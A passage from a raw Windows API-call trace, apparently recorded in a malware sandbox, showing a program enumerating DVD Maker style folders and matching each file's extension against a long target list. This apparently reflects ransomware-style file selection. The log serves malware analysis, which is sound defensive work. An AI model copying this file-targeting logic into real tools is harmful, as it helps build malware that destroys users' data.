lpString2=".png") returned -1 [0036.222] lstrlenW (lpString=".3gp") returned 4 [0036.222] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0036.222] lstrlenW (lpString=".7z") returned 3 [0036.222] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0036.222] lstrlenW (lpString=".accda") returned 6 [0036.222] lstrcmpiW (lpString1=".accda", lpString2="ht.png") returned -1 [0036.222] lstrlenW (lpString=".accdb") returned 6 [0036.222] lstrcmpiW (lpString1=".accdb", lpString2="ht.png") returned -1 [0036.222] lstrlenW (lpString=".accdc") returned 6 [0036.222] lstrcmpiW (lpString1=".accdc", lpString2="ht.png") returned -1 [0036.222] lstrlenW (lpString=".accde") returned 6 [0036.222] lstrcmpiW (lpString1=".accde", lpString2="ht.png") returned -1 [0036.222] lstrlenW (lpString=".accdt") returned 6 [0036.222] lstrcmpiW (lpString1=".accdt", lpString2="ht.png") returned -1 [0036.222] lstrlenW (lpString=".accdw") returned 6 [0036.222] lstrcmpiW (lpString1=".accdw", lpString2="ht.png") returned -1 [0036.222] lstrlenW (lpString=".adb") returned 4 [0036.222] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0036.222] lstrlenW (lpString=".adp") returned 4 [0036.222] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0036.222] lstrlenW (lpString=".ai") returned 3 [0036.222] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0036.222] lstrlenW (lpString=".ai3") returned 4 [0036.222] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0036.222] lstrlenW (lpString=".ai4") returned 4 [0036.222] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0036.222] lstrlenW (lpString=".ai5") returned 4 [0036.222] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0036.222] lstrlenW (lpString=".ai6") returned 4 [0036.222] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0036.222] lstrlenW (lpString=".ai7") returned 4 [0036.222] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71123769, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71123769, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-image-mask.png", cAlternateFileName="")) returned 1 [0036.222] lstrlenW (lpString="16_9-frame-image-mask.png") returned 25 [0036.222] lstrlenW (lpString=".1cd") returned 4 [0036.223] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711498c6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711498c6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-overlay.png", cAlternateFileName="")) returned 1 [0036.223] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71254251, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71254251, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2f993, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0036.223] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7116fa23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7116fa23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2a88, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0036.223] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7116fa23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7116fa23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x280e, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0036.223] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711bbcdd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711bbcdd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2808, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0036.223] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711bbcdd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711bbcdd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x946, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0036.223] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711e1e3a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711e1e3a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6bbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-overlay.png", cAlternateFileName="")) returned 1 [0036.224] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71207f97, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71207f97, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb53, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memories_buttonClear.png", cAlternateFileName="")) returned 1 [0036.224] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7122e0f4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7122e0f4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2a88, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_btn-back-static.png", cAlternateFileName="")) returned 1 [0036.224] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7127a3ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7127a3ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a7ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_content-background.png", cAlternateFileName="")) returned 1 [0036.224] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710b1352, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710b1352, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4f7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="scrapbook.png", cAlternateFileName="")) returned 1 [0036.224] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712c6668, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712c6668, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x390c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_content-background.png", cAlternateFileName="")) returned 1 [0036.224] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2c6fe3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1368, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_mainImage-mask.png", cAlternateFileName="")) returned 1 [0036.224] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc47, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_select-highlight.png", cAlternateFileName="")) returned 1 [0036.225] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc47, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_select-highlight.png", cAlternateFileName="")) returned 0 [0036.225] FindClose (in: hFindFile=0x3ef1300 | out: hFindFile=0x3ef1300) returned 1 [0036.225] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ef2068 | out: hHeap=0x570000) returned 1 [0036.225] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e96ab6a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e96ab6a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="menu_style_default_Thumbnail.png", cAlternateFileName="")) returned 1 [0036.225] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0036.225] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0036.225] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef38095, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef38095, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0036.225] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef5e1f2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef5e1f2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0036.226] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0036.226] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0036.226] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x3fa24d0, Size=0x20000) returned 0x3ef2068 [0036.226] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OldAge", cAlternateFileName="")) returned 1 [0036.226] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3fa24d0 [0036.226] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*", lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName=".", cAlternateFileName="")) returned 0x3ef1300 [0036.234] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="..", cAlternateFileName="")) returned 1 [0036.234] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fcc1ca4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fcc1ca4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0036.235] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fce7e01, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fce7e01, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0036.235] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd0df5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd0df5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x183b, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="decorative_rule.png", cAlternateFileName="")) returned 1 [0036.235] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdcc62f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdcc62f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0036.235] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd80375, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd80375, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0036.235] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fda64d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fda64d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0036.235] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd340bb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd340bb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d31329f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0036.235] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd0df5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd0df5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d31329f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0036.236] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd5a218, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd5a218, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0036.236] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9bb47, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc9bb47, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="vintage.png", cAlternateFileName="")) returned 1 [0036.236] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9bb47, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fc9bb47, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d3393fd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="vintage.png", cAlternateFileName="")) returned 0 [0036.236] FindClose (in: hFindFile=0x3ef1300 | out: hFindFile=0x3ef1300) returned 1 [0036.237] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fa24d0 | out: hHeap=0x570000) returned 1 [0036.237] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Performance", cAlternateFileName="PERFOR~1")) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3fa24d0 [0036.237] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*", lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName=".", cAlternateFileName="")) returned 0x3ef1300 [0036.251] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4fdbf3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab8e11a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f9e8c42, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="..", cAlternateFileName="")) returned 1 [0036.251] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70562bb6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70562bb6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="720x480blacksquare.png", cAlternateFileName="")) returned 1 [0036.251] FindNextFileW (in: 